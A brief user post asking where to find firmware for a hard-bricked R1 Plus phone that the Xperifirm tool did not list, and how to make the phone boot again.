Actually I hardbricked my R1 Plus accidentally. Unable to find its firmware anywhere on the internet. Xperifirm didn't have this model in it previously. Could you please let me know where I could find its ROM and also how to boot up my phone again?